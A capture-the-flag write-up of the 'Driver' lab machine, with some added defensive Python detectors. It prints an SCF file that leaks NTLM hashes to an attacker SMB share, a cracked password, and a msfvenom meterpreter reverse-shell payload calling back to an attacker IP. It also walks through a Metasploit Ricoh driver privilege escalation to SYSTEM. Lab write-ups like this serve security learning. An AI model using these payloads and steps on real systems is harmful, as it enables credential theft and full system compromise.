Driver

Reconnaissance

Port Discovery

sudo nmap -PN -sC -sV -oN driver 10.10.11.106
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-14 15:58 PKT
Nmap scan report for 10.10.11.106
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-14T17:34:34
|_  start_date: 2025-08-14T17:23:03
|_clock-skew: mean: 6h35m42s, deviation: 0s, median: 6h35m42s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.94 seconds

Port 80 hosts a Microsoft IIS web server. Port 135 is open for MSRPC, port 445 for SMB, and port 5985 for WinRM. Note that SMB message signing is enabled but not required.

Web Enumeration

On visiting the site, we are prompted for creds.


admin:admin works.


Every link leads to the firmware update page.

I tried submitting a png and it was accepted.

Fingerprinting

whatweb 10.10.11.106            
http://10.10.11.106 [401 Unauthorized] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.10.11.106], Microsoft-IIS[10.0], PHP[7.3.25], WWW-Authenticate[MFP Firmware Update Center. Please enter password for admin][Basic], X-Powered-By[PHP/7.3.25]

I tried uploading multiple files, but the real question is where the uploaded files end up: without knowing the share path, how would we trigger anything? Directory busting didn't yield any results either. What we are left with is the Shell Command File attack.

Foothold

Shell Command File Attack (scf)

SCF files don't run arbitrary code. However, Windows Explorer automatically fetches the icon referenced by an SCF file, even when it points at a remote UNC path. Just browsing to the folder that contains the SCF file is enough.

Scenario:

Target allows uploading .scf files into a shared folder or document management system that employees browse.

  • Attacker uploads malicious.scf with IconFile=\\attacker-ip\share\icon.ico.
  • A victim browses that directory in Windows Explorer.
  • Windows tries to load the icon over SMB, sending the victim’s NTLM credentials.
  • Attacker captures and reuses those creds.

Let’s craft an SCF file first:

cat wow.scf        
[Shell]
Command=2
IconFile=\\10.10.16.30\share\test
[Taskbar]
Command=ToggleDesktop
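The scenario above is what an upload handler should be screening for. The following is an added example, not code from the original write-up: it parses the INI-style SCF format by content (so a payload renamed to .png is still caught) and flags any IconFile that points at a UNC host, since that reference is what makes Explorer authenticate over SMB when the folder is browsed. The sample uploads at the bottom are constructed; the first one is the SCF shown above.

```python
"""Detect SCF content in uploaded files and flag UNC icon references.

Added example, not code from the original write-up. SCF is a tiny INI-style
format; the dangerous part is an IconFile entry naming a UNC path, because
Explorer resolves that icon (and sends NTLM authentication over SMB) as soon
as someone browses the folder containing the file.
"""
import configparser
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# \\host\share\...  (forward-slash variants resolve on Windows too)
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")


@dataclass
class ScfVerdict:
    is_scf: bool              # file parsed as an SCF ([Shell] section present)
    icon_file: Optional[str]  # raw IconFile value, if any
    unc_host: Optional[str]   # host named in a UNC IconFile, if any
    risky: bool               # True when browsing the folder would trigger SMB auth


def inspect_scf(data: bytes) -> ScfVerdict:
    """Classify a file by its content, ignoring the extension it was uploaded with."""
    text = data.decode("utf-8", errors="replace")
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:  # binary data, no section header, etc.
        return ScfVerdict(False, None, None, False)
    # configparser section names are case-sensitive; Windows' SCF reader is not.
    shell = next((s for s in parser.sections() if s.lower() == "shell"), None)
    if shell is None:
        return ScfVerdict(False, None, None, False)
    icon = parser.get(shell, "IconFile", fallback=None)  # option names are case-folded
    host = None
    if icon:
        m = UNC_RE.match(icon.strip())
        if m:
            host = m.group(1)
    return ScfVerdict(True, icon, host, host is not None)


def screen_uploads(uploads: List[Tuple[str, bytes]]) -> List[str]:
    """Return the names of uploads an upload handler should reject."""
    return [name for name, data in uploads if inspect_scf(data).risky]


# Constructed samples: the write-up's SCF, a benign "Show Desktop" style SCF,
# the same payload renamed to .png, and the start of a real PNG header.
SAMPLES = [
    ("wow.scf", b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.16.30\\share\\test\r\n"
                b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    ("show_desktop.scf", b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
                         b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    ("firmware.png", b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.16.30\\share\\x\r\n"),
    ("logo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, inspect_scf(data))
    print("reject:", screen_uploads(SAMPLES))
```

Extension checks alone would have let the .png variant through, which is the point of inspecting content: the firmware upload form on this box accepted a .png, and nothing about SCF requires the .scf extension to be present in the bytes.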

Let's run Responder to capture the NTLM hashes. Ensure the SMB server is enabled:

sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.6.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]

Uploading the SCF file immediately triggers the SMB request and we get the hash:

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:983080659d696e…

We save the entire challenge-response and crack it with hashcat:

TONY::DRIVER:983080659d696e67:4cdb5a8db313783f514af1a0558492b1:…:liltony

The password is liltony, so the credentials are tony:liltony.

Let’s try evil-winrm and we are in:

evil-winrm -i 10.10.11.106 -u tony -p liltony
zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby3.1: no such file or directory
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                          
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                     
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>

Privilege Escalation

Let's start by running winPEAS, which points at the PowerShell history file:

    PS history file: C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 134B
*Evil-WinRM* PS C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline> type ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1

Let's see what the driver is, and whether it comes with any known vulnerabilities.

There are a ton of privilege escalation vulnerabilities associated with Ricoh printer drivers. The relevant one here is CVE-2019-19363.

CVE-2019-19363 PE

There is a Metasploit module for it.

We have full permissions on the driver directory:

*Evil-WinRM* PS C:\ProgramData\RICOH_DRV> icacls C:\ProgramData\RICOH_DRV
C:\ProgramData\RICOH_DRV Everyone:(OI)(CI)(F)

*Evil-WinRM* PS C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz> icacls "C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz"
C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz Everyone:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz> dir -Force


    Directory: C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/11/2021   7:21 AM                help
-a----         7/2/2019   3:58 PM         176128 borderline.dll
-a----         7/2/2019   3:58 PM         443392 colorbalance.dll
-a----         7/2/2019   3:58 PM         531456 headerfooter.dll
-a----         7/2/2019   3:58 PM        2229760 jobhook.dll
-a----         7/2/2019   3:58 PM         407552 outputimage.dll
-a----         7/2/2019   3:58 PM        3745792 overlaywatermark.dll
-a----         7/2/2019   3:58 PM        3960832 popup.dll
-a----         7/2/2019   3:58 PM         400384 printercopyguardpreview.dll
-a----         7/2/2019   3:58 PM         401920 printerpreventioncopypatternpreview.dll
-a----         7/2/2019   3:58 PM         291328 secretnumberingpreview.dll
-a----         7/2/2019   3:58 PM        5237760 watermark.dll
-a----         7/2/2019   3:58 PM         321536 watermarkpreview.dll
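The icacls output above is the whole vulnerability condition: Everyone has (OI)(CI)(F) on the driver directory, and the inheritance flags mean any file a standard user drops in there gets the same ACE, so the DLLs the spooler loads as SYSTEM can be replaced. The following is an added defensive example, not code from the write-up or the Metasploit module: it parses `icacls <path>` output and reports ACEs that give low-privileged principals write access. The first ACE line in the sample is the one shown above; the inherited SYSTEM, Administrators and Users entries are constructed to look like a typical ProgramData listing.

```python
"""Audit icacls output for directories writable by low-privileged principals.

Added example (not part of the original write-up): parses the text that
`icacls <path>` prints and reports ACEs that let ordinary users write into
the directory, including whether the ACE propagates to new files ((OI)/(CI)),
which is what lets a standard user plant or replace DLLs in a driver folder.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")
FLAG_RE = re.compile(r"\(([^)]*)\)")

# Rights that allow creating or modifying files: the simple rights plus the
# granular ones icacls prints when a mask doesn't map to a simple right.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO", "GA", "GW"}

# Principals every interactive or authenticated user is a member of.
LOW_PRIV = {
    "everyone", "builtin\\users", "users",
    "nt authority\\authenticated users", "authenticated users",
    "nt authority\\interactive", "interactive",
}


@dataclass
class WritableAce:
    path: str
    principal: str
    rights: List[str]
    inherits_to_children: bool  # (OI)/(CI): new files and subfolders get the ACE too


def parse_icacls(output: str, path: str) -> List[Tuple[str, List[str]]]:
    """Return (principal, flags) for every ACE in the output of `icacls path`."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        # The first ACE shares its line with the path (which may contain
        # spaces, hence matching on the known path); later ACEs are indented.
        if raw.startswith(path + " "):
            line = raw[len(path) + 1:].strip()
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("principal"), FLAG_RE.findall(m.group("flags"))))
    return aces


def audit_icacls(output: str, path: str) -> List[WritableAce]:
    """List allow-ACEs that grant write rights to low-privileged principals."""
    findings = []
    for principal, flags in parse_icacls(output, path):
        if "DENY" in flags or principal.lower() not in LOW_PRIV:
            continue
        rights = [f for f in flags if f in WRITE_RIGHTS]
        if rights:
            findings.append(WritableAce(path, principal, rights,
                                        bool({"OI", "CI"} & set(flags))))
    return findings


# Constructed sample: first ACE is the one from the box, the rest are typical
# inherited ProgramData entries added for illustration.
DLZ = r"C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz"
SAMPLE = r"""C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz Everyone:(OI)(CI)(F)
                                                                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                                    BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                                    BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for f in audit_icacls(SAMPLE, DLZ):
        print(f"{f.path}: {f.principal} has {f.rights}"
              f"{' (inherited by new files)' if f.inherits_to_children else ''}")
```

BUILTIN\Users with (RX) is correctly left out of the findings: read and execute on a driver directory is expected, full control for Everyone is not. Running this over collected icacls output for the spooler's driver directories under C:\ProgramData and C:\Windows\System32\spool is a cheap way to spot the same condition before an attacker does.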

There's a POC available as well.

Exploiting it was very unstable for me. I tried different Metasploit payloads.

Metasploit

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.30 LPORT=4444 -f exe -o msf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: msf.exe

At the same time, start a handler, catch the session, and then switch to the Ricoh module:

msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.16.30

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.30:4444 
[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Meterpreter session 2 opened (10.10.16.30:4444 -> 10.10.11.106:49419) at 2025-08-14 19:35:36 +0500

meterpreter > getuid
Server username: DRIVER\tony
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search ricoh

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  exploit/windows/ftp/ricoh_dl_bof            2012-03-01       normal  Yes    Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
   1  exploit/windows/local/ricoh_driver_privesc  2020-01-22       normal  Yes    Ricoh Driver Privilege Escalation


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/ricoh_driver_privesc                                                            

msf6 exploit(multi/handler) > use 1

msf6 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ricoh_driver_privesc) > set LHOST tun0
LHOST => 10.10.16.30
msf6 exploit(windows/local/ricoh_driver_privesc) > set session 2
session => 2
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.30:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer XAAuzA...
^C[-] Exploit failed [user-interrupt]: Interrupt 
[*] Deleting printer XAAuzA
^C[*] Deleting printer XAAuzA
^C[-] run: Interrupted

It was stuck for some reason. I then found out that we have to migrate to another process first.

msf6 exploit(windows/local/ricoh_driver_privesc) > sessions 2
[*] Starting interaction with 2...

meterpreter > ps

Process List
============

 PID   PPID  Name           Arch  Session  User         Path
 ---   ----  ----           ----  -------  ----         ----
 0     0     [System Proce
             ss]
 4     0     System
 272   4     smss.exe
 348   340   csrss.exe
 456   448   csrss.exe
 464   340   wininit.exe
 508   448   winlogon.exe
 572   464   services.exe
 580   464   lsass.exe
 660   572   svchost.exe
 708   572   svchost.exe
 756   952   WUDFHost.exe
 804   508   dwm.exe
 816   572   svchost.exe
 868   572   svchost.exe
 944   572   svchost.exe
 952   572   svchost.exe
 968   660   explorer.exe   x64   1        DRIVER\tony  C:\Windows\explorer.exe
 1004  572   svchost.exe
 1036  572   svchost.exe
 1280  572   spoolsv.exe
 1304  572   sedsvc.exe
 1376  572   svchost.exe
 1540  572   svchost.exe
 1560  572   svchost.exe
 1592  572   svchost.exe
 1600  572   VGAuthService
             .exe
 1664  572   vm3dservice.e
             xe
 1712  2884  conhost.exe    x64   1        DRIVER\tony  C:\Windows\System32\conhost.ex
                                                        e
 1724  572   svchost.exe
 1736  572   vmtoolsd.exe
 1984  1664  vm3dservice.e
             xe
 2120  572   svchost.exe    x64   1        DRIVER\tony  C:\Windows\System32\svchost.ex
                                                        e
 2148  2852  SearchFilterH
             ost.exe
 2228  572   dllhost.exe
 2424  572   msdtc.exe
 2488  660   WmiPrvSE.exe
 2680  572   svchost.exe
 2724  816   sihost.exe     x64   1        DRIVER\tony  C:\Windows\System32\sihost.exe
 2776  660   explorer.exe   x64   1        DRIVER\tony  C:\Windows\explorer.exe
 2832  816   taskhostw.exe  x64   1        DRIVER\tony  C:\Windows\System32\taskhostw.
                                                        exe
 2848  3164  msf.exe        x64   0        DRIVER\tony  C:\Users\tony\Documents\msf.ex
                                                        e
 2852  572   SearchIndexer
             .exe
 2884  816   cmd.exe        x64   1        DRIVER\tony  C:\Windows\System32\cmd.exe
 2956  572   svchost.exe
 3068  2852  SearchProtoco
             lHost.exe
 3164  660   wsmprovhost.e  x64   0        DRIVER\tony  C:\Windows\System32\wsmprovhos
             xe                                         t.exe
 3180  3156  explorer.exe   x64   1        DRIVER\tony  C:\Windows\explorer.exe
 3240  660   RuntimeBroker  x64   1        DRIVER\tony  C:\Windows\System32\RuntimeBro
             .exe                                       ker.exe
 3544  2848  cmd.exe        x64   0        DRIVER\tony  C:\Windows\System32\cmd.exe
 3564  660   ShellExperien  x64   1        DRIVER\tony  C:\Windows\SystemApps\ShellExp
             ceHost.exe                                 erienceHost_cw5n1h2txyewy\Shel
                                                        lExperienceHost.exe
 3652  660   SearchUI.exe   x64   1        DRIVER\tony  C:\Windows\SystemApps\Microsof
                                                        t.Windows.Cortana_cw5n1h2txyew
                                                        y\SearchUI.exe
 3684  2852  SearchProtoco  x64   1        DRIVER\tony  C:\Windows\System32\SearchProt
             lHost.exe                                  ocolHost.exe
 3896  660   explorer.exe   x64   1        DRIVER\tony  C:\Windows\explorer.exe
 4192  660   WmiPrvSE.exe
 4592  2884  PING.EXE       x64   1        DRIVER\tony  C:\Windows\System32\PING.EXE
 4596  3180  vmtoolsd.exe   x64   1        DRIVER\tony  C:\Program Files\VMware\VMware
                                                         Tools\vmtoolsd.exe
 4644  3180  OneDrive.exe   x86   1        DRIVER\tony  C:\Users\tony\AppData\Local\Mi
                                                        crosoft\OneDrive\OneDrive.exe
 4728  572   svchost.exe
 4952  3544  conhost.exe    x64   0        DRIVER\tony  C:\Windows\System32\conhost.ex
                                                        e

meterpreter > migrate -N explorer.exe
[*] Migrating from 2848 to 3180...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 2...

After migrating, I had to run the module twice more before it gave a session:

msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.30:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer eITDRmA...
[*] Deleting printer eITDRmA
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.30:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer ZyIXWTt...
[*] Sending stage (203846 bytes) to 10.10.11.106
[+] Deleted C:\Users\tony\AppData\Local\Temp\eIweTu.bat
[+] Deleted C:\Users\tony\AppData\Local\Temp\headerfooter.dll
[*] Meterpreter session 3 opened (10.10.16.30:4444 -> 10.10.11.106:49420) at 2025-08-14 19:45:00 +0500
[*] Deleting printer ZyIXWTt

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

This post is licensed under CC BY 4.0 by the author.